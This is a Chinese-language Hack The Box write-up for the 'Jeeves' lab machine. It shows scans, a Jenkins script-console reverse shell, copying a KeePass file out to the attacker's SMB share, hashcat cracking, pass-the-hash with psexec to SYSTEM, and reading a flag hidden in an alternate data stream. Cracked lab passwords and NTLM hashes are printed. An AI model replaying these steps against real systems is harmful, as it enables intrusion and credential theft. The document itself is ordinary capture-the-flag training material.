Jeeves-htb-writeup

0x00 靶场技能介绍

章节技能:深度目录枚举、jenkins拿shell、.kdbx文件加密破解、keepassXC读取.kdbx数据库、密码枚举、文件流技术

参考链接:https://www.jgeek.cn/article/110.html

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.63

2、获取下开放端口情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=2000 10.10.10.63 -oG allports -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 07:01 CST
Nmap scan report for 10.10.10.63
Host is up (0.37s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
50000/tcp open  ibm-db2

Nmap done: 1 IP address (1 host up) scanned in 100.73 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80,135,445,50000 -sC -sV --min-rate=2000 10.10.10.63                                                                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 07:07 CST
Nmap scan report for 10.10.10.63
Host is up (0.24s latency).

PORT      STATE    SERVICE      VERSION
80/tcp    open     http         Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   filtered msrpc
445/tcp   filtered microsoft-ds
50000/tcp filtered ibm-db2
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.08 seconds

3、简单查看下默认的80端口页面

http://10.10.10.63/

http://10.10.10.63/error.html?

4、感觉也不像是个入口点,继续看看另一个50000端口

http://10.10.10.63:50000

5、扫下目录看看有什么发现吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://10.10.10.63:50000/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.63:50000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

askjeeves               [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 121ms]
[WARN] Caught keyboard interrupt (Ctrl-C)

6、查看该目录情况

http://10.10.10.63:50000/askjeeves/

7、可以匿名访问,执行下命令吧

1
2
3
4
5
6
7
8
9
Started by user anonymous
Building in workspace C:\Users\Administrator\.jenkins\workspace\test1
[test1] $ cmd /c call C:\Users\kohsuke\AppData\Local\Temp\jenkins7419465613522893143.bat

C:\Users\Administrator\.jenkins\workspace\test1>whoami
jeeves\kohsuke

C:\Users\Administrator\.jenkins\workspace\test1>exit 0 
Finished: SUCCESS

8、其实这个 jenkins 靶场,目前我已经算是遇到第4回了,所以还是有一些经验了,故上就随便执行了下,发现可以执行一些命令,故再次尝试下看看网络与靶机是否能ping通。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Started by user anonymous
Building in workspace C:\Users\Administrator\.jenkins\workspace\test1
[test1] $ cmd /c call C:\Users\kohsuke\AppData\Local\Temp\jenkins4410486682208148338.bat

C:\Users\Administrator\.jenkins\workspace\test1>ping 10.10.14.39 

Pinging 10.10.14.39 with 32 bytes of data:
Reply from 10.10.14.39: bytes=32 time=135ms TTL=63
Reply from 10.10.14.39: bytes=32 time=239ms TTL=63
Reply from 10.10.14.39: bytes=32 time=136ms TTL=63
Reply from 10.10.14.39: bytes=32 time=246ms TTL=63

Ping statistics for 10.10.14.39:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 135ms, Maximum = 246ms, Average = 189ms

C:\Users\Administrator\.jenkins\workspace\test1>exit 0 
Finished: SUCCESS

9、可以看出来靶机是通的,那就开始尝试下,是否可以获取反弹shell吧。

1
2
3
4
5
6
7
8
9
10
11
https://sh1yan.top/rt-cmd/

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443           
listening on [any] 443 ...
connect to [10.10.14.39] from (UNKNOWN) [10.10.10.63] 49676

PS C:\Users\Administrator\.jenkins\workspace\test1> 
PS C:\Users\Administrator\.jenkins\workspace\test1> whoami
jeeves\kohsuke
PS C:\Users\Administrator\.jenkins\workspace\test1>

10、可以,那就读取下flag信息吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
PS C:\Users\Administrator\.jenkins\workspace\test1> ls C:/Users


    Directory: C:\Users


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        11/3/2017  11:07 PM                Administrator                                                         
d-----        11/5/2017   9:17 PM                DefaultAppPool                                                        
d-----        11/3/2017  11:19 PM                kohsuke                                                               
d-r---       10/25/2017   4:46 PM                Public                                                                


PS C:\Users\Administrator\.jenkins\workspace\test1> cd C:/Users/kohsuke/Desktop
PS C:\Users\kohsuke\Desktop> ls


    Directory: C:\Users\kohsuke\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---        11/3/2017  11:22 PM             32 user.txt                                                              


PS C:\Users\kohsuke\Desktop> cat user.txt
e3232272596fb47950d59c4cf1e7066a
PS C:\Users\kohsuke\Desktop>

11、这里补一下上面我如何拿shell的方式的截图:

图8:Jenkins首页 → 新建 → 输入任务名称 → 选择构建一个自由风格的软件项目

图9:在构建环境这里选择 Execute Windows batch command ,然后输入base64的powershell 的反弹shell。

0x02 系统权限获取

12、开始内部的信息枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
PS C:\Users\Administrator\.jenkins> ls


    Directory: C:\Users\Administrator\.jenkins


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        4/27/2024   6:27 AM                jobs                                                                  
d-----        11/3/2017  10:33 PM                logs                                                                  
d-----        11/3/2017  10:33 PM                nodes                                                                 
d-----        11/3/2017  10:44 PM                plugins                                                               
d-----       12/24/2017   2:47 AM                secrets                                                               
d-----        11/8/2017   8:52 AM                updates                                                               
d-----        11/3/2017  10:33 PM                userContent                                                           
d-----        11/3/2017  10:33 PM                users                                                                 
d-----        11/3/2017  10:47 PM                war                                                                   
d-----        11/3/2017  10:43 PM                workflow-libs                                                         
d-----        4/27/2024   6:28 AM                workspace                                                             
-a----        11/8/2017   4:45 PM             48 .owner                                                                
-a----        4/27/2024   6:25 AM           1684 config.xml                                                            
-a----        4/27/2024   6:25 AM            156 hudson.model.UpdateCenter.xml                                         
-a----        11/3/2017  10:43 PM            374 hudson.plugins.git.GitTool.xml                                        
-a----        11/3/2017  10:33 PM           1712 identity.key.enc                                                      
-a----        11/3/2017  10:46 PM             94 jenkins.CLI.xml                                                       
              4/27/2024   6:25 AM          77315 jenkins.err.log                                                       
-a----        11/3/2017  10:47 PM         360448 jenkins.exe                                                           
-a----        11/3/2017  10:47 PM            331 jenkins.exe.config                                                    
-a----        4/27/2024   6:25 AM              4 jenkins.install.InstallUtil.lastExecVersion                           
-a----        11/3/2017  10:45 PM              4 jenkins.install.UpgradeWizard.state                                   
-a----        11/3/2017  10:46 PM            138 jenkins.model.DownloadSettings.xml                                    
             10/25/2022  12:41 PM           2856 jenkins.out.log                                                       
-a----        4/27/2024   6:25 AM              4 jenkins.pid                                                           
-a----        11/3/2017  10:46 PM            169 jenkins.security.QueueItemAuthenticatorConfiguration.xml              
-a----        11/3/2017  10:46 PM            162 jenkins.security.UpdateSiteWarningsConfiguration.xml                  
-a----        11/3/2017  10:47 PM       74271222 jenkins.war                                                           
-a----        4/27/2024   6:25 AM          36360 jenkins.wrapper.log                                                   
-a----        11/3/2017  10:49 PM           2881 jenkins.xml                                                           
-a----        4/27/2024   6:25 AM            907 nodeMonitors.xml                                                      
-a----        11/3/2017  10:47 PM            129 queue.xml.bak                                                         
-a----        11/3/2017  10:33 PM             64 secret.key                                                            
-a----        11/3/2017  10:33 PM              0 secret.key.not-so-secret                                              


PS C:\Users\Administrator\.jenkins> systeminfo

Host Name:                 JEEVES
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.10586 N/A Build 10586
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00331-20304-47406-AA297
Original Install Date:     10/25/2017, 4:45:33 PM
System Boot Time:          4/27/2024, 6:24:52 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,164 MB
Virtual Memory: Max Size:  2,687 MB
Virtual Memory: Available: 1,684 MB
Virtual Memory: In Use:    1,003 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 10 Hotfix(s) Installed.
                           [01]: KB3150513
                           [02]: KB3161102
                           [03]: KB3172729
                           [04]: KB3173428
                           [05]: KB4021702
                           [06]: KB4022633
                           [07]: KB4033631
                           [08]: KB4035632
                           [09]: KB4051613
                           [10]: KB4041689
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.63
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
PS C:\Users\Administrator\.jenkins> 

# 上枚举工具,开始枚举

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.63 - - [27/Apr/2024 21:51:18] "GET /winPEASx64.exe HTTP/1.1" 200 -

PS C:\Users\kohsuke\Desktop> ./enum.exe

? Check if you have some admin equivalent privileges https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#users-and-groups
  Current user: kohsuke
  Current groups: Domain Users, Everyone, Users, Service, Console Logon, Authenticated Users, This Organization, Local account, Local, NTLM Authentication
   =================================================================================================

    JEEVES\Administrator: Built-in account for administering the computer/domain
        |->Groups: Administrators
        |->Password: CanChange-NotExpi-Req

    JEEVES\DefaultAccount(Disabled): A user account managed by the system.
        |->Groups: System Managed Accounts Group
        |->Password: CanChange-NotExpi-NotReq

    JEEVES\Guest(Disabled): Built-in account for guest access to the computer/domain
        |->Groups: Guests
        |->Password: NotChange-NotExpi-NotReq

    JEEVES\kohsuke
        |->Groups: Users
        |->Password: CanChange-Expi-Req

? Check if any interesting processes for memory dump or if you could overwrite some binary running https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#running-processes                                                                                                                                                                           
    cmd(3692)[C:\Windows\SysWOW64\cmd.exe] -- POwn: kohsuke
    Command Line: cmd /c call C:\Users\kohsuke\AppData\Local\Temp\jenkins1222239407732559434.bat


    jenkins(2708)[C:\Users\Administrator\.jenkins\jenkins.exe] -- POwn: kohsuke -- isDotNet
    Permissions: kohsuke [AllAccess]
    Possible DLL Hijacking folder: C:\Users\Administrator\.jenkins (kohsuke [AllAccess])
    Command Line: "C:\Users\Administrator\.jenkins\jenkins.exe"


  Version: NetNTLMv2
  Hash:    kohsuke::JEEVES:1122334455667788:7a827f38b54fae3f3151676f68a0c93c:0101000000000000d46708d19098da01fbbbed404b08d8f100000000080030003000000000000000000000000030000045099ebf9df87c975e02f798e39b62ef397a0a1229ebd19ee646cc9a7539dc8d0a00100000000000000000000000000000000000090000000000000000000000  

PS C:\Users\Administrator\.jenkins> cd C:/Users/kohsuke
PS C:\Users\kohsuke> 
PS C:\Users\kohsuke> tree /F /A
Folder PATH listing
Volume serial number is 00000200 71A1:6FA1
C:.
+---.groovy
|   \---grapes
+---Contacts
+---Desktop
|       enum.exe
|       user.txt
|       
+---Documents
|       CEH.kdbx
|       
+---Downloads
+---Favorites
|   |   Bing.url
|   |   
|   \---Links
+---Links
|       Desktop.lnk
|       Downloads.lnk
|       OneDrive.lnk
|       
+---Music
+---OneDrive
+---Pictures
|   +---Camera Roll
|   \---Saved Pictures
+---Saved Games
+---Searches
|       winrt--{S-1-5-21-2851396806-8246019-2289784878-1001}-.searchconnector-ms
|       
\---Videos
PS C:\Users\kohsuke> 


PS C:\Users\kohsuke\Documents> ls


    Directory: C:\Users\kohsuke\Documents


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        9/18/2017   1:43 PM           2846 CEH.kdbx                                                              


PS C:\Users\kohsuke\Documents> net use \\10.10.14.39\share /u:test test
The command completed successfully.

PS C:\Users\kohsuke\Documents> dir \\10.10.14.39\share


    Directory: \\10.10.14.39\share


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        3/29/2024   4:50 AM                .svn                                                                  
d-----        4/21/2024   6:09 PM                htb-vpn                                                               
d-----        4/24/2024   5:12 PM                tools                                                                 
d-----        4/26/2024   7:26 PM                reports                                                               
d-----        4/26/2024   7:20 PM                results                                                               
-a----        4/26/2024   7:05 PM            381 allports                                                              


PS C:\Users\kohsuke\Documents> copy CEH.kdbx \\10.10.14.3\share\CEH.kdbx
PS C:\Users\kohsuke\Documents> copy CEH.kdbx \\10.10.14.39\share\CEH.kdbx
PS C:\Users\kohsuke\Documents>

13、在枚举中发现了个 .kdbx 的数据库文件,并下载到了本地,下面开始尝试破解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
┌──(kali㉿offsec)-[~/Desktop]
└─$ file CEH.kdbx                                                                                                   
CEH.kdbx: Keepass password database 2.x KDBX
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ keepass2john CEH.kdbx                                               
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ touch keepass
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo 'CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48' > keepass 
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ cat keepass     
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "keepass"
  13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES)                | Password Manager
  29700 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) - keyfile only mode | Password Manager

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 13400 ./keepass /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48:moonshine1
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Hash.Target......: $keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea...47db48
Time.Started.....: Sun Apr 28 00:22:49 2024 (9 secs)
Time.Estimated...: Sun Apr 28 00:22:58 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     6469 H/s (7.32ms) @ Accel:256 Loops:256 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 55296/14344385 (0.39%)
Rejected.........: 0/55296 (0.00%)
Restore.Point....: 54272/14344385 (0.38%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:5888-6000
Candidate.Engine.: Device Generator
Candidates.#1....: 250895 -> grad2010
Hardware.Mon.#1..: Util: 98%

Cracking performance lower than expected?                 

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => Started: Sun Apr 28 00:22:41 2024
Stopped: Sun Apr 28 00:22:59 2024

14、这里破解出来了密码,使用 keepassXC进行加载该数据库和查看

15、经过不断枚举,发现最下面的hash值是正确的,可以正常登录

1
2
3
4
5
6
7
8
9
10
11
12
moonshine1

administrator

S1TjAtJHKsugh9oC4VZl

aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.63 -u 'administrator' -H 'e0fb1fb85756c24235ff238cbe81fe00'
SMB         10.10.10.63     445    JEEVES           [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB         10.10.10.63     445    JEEVES           [+] Jeeves\administrator:e0fb1fb85756c24235ff238cbe81fe00 (Pwn3d!)

16、那就登录下开始获取flag吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-psexec administrator@10.10.10.63 -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.10.63.....
[*] Found writable share ADMIN$
[*] Uploading file STnNhPDV.exe
[*] Opening SVCManager on 10.10.10.63.....
[*] Creating service LIeY on 10.10.10.63.....
[*] Starting service LIeY.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whomai
'whomai' is not recognized as an internal or external command,
operable program or batch file.
 
C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> cat C:/Users/Administrator/Desktop/root.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>

17、奇怪了,并没有这个文件?继续分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
C:\Windows\system32> 
C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:/Users/Administrator/Desktop/root.txt
The syntax of the command is incorrect.
 
C:\Windows\system32> cd C:/Users/Administrator/Desktop/
 
C:\Users\Administrator\Desktop> ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,582,810,624 bytes free

C:\Users\Administrator\Desktop> type hm.txt
The flag is elsewhere.  Look deeper.
C:\Users\Administrator\Desktop> dir /Ah
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\Users\Administrator\Desktop

11/03/2017  10:03 PM               282 desktop.ini
               1 File(s)            282 bytes
               0 Dir(s)   2,582,810,624 bytes free

C:\Users\Administrator\Desktop> dir /AD
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)   2,582,810,624 bytes free

C:\Users\Administrator\Desktop> type desktop.ini
 
[.ShellClassInfo]
LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21769
IconResource=%SystemRoot%\system32\imageres.dll,-183

C:\Users\Administrator\Desktop> dir /R
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,582,810,624 bytes free

C:\Users\Administrator\Desktop>

18、发现猫腻了,这里最终获取下flag吧

1
2
3
4
5
6
7
C:\Users\Administrator\Desktop> type hm.txt:root.txt:$DATA
The filename, directory name, or volume label syntax is incorrect.
 
C:\Users\Administrator\Desktop> more <hm.txt:root.txt      
afbc5bd4b615a60648cec41c6ac92530

C:\Users\Administrator\Desktop>

19、原理解释

1
2
3
4
5
怀疑存在隐藏,在 dir 中加入 /R 参数出现 hm.txt:root.txt:$DATA 文件。

通过搜索了解到含有 :$DATA 结尾的文件,微软文件中叫文件流(File Streams)也有叫 Alternate Data Streams (ADS) 的,文件流可以做为执行文件从命令行执行,但它们不会显示在 Windows 资源管理器(或控制台)中。因为它们很难找到,所以黑客经常使用它们来隐藏他们已经入侵的机器上的文件(可能是 rootkit 的文件)。

运行 more 命令成功得到 root flag。

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/114

打靶记
#shooting-range
Jeeves-htb-writeup
https://sh1yan.top/2024/04/26/Jeeves-htb-writeup/
作者
shiyan
发布于
2024年4月26日
许可协议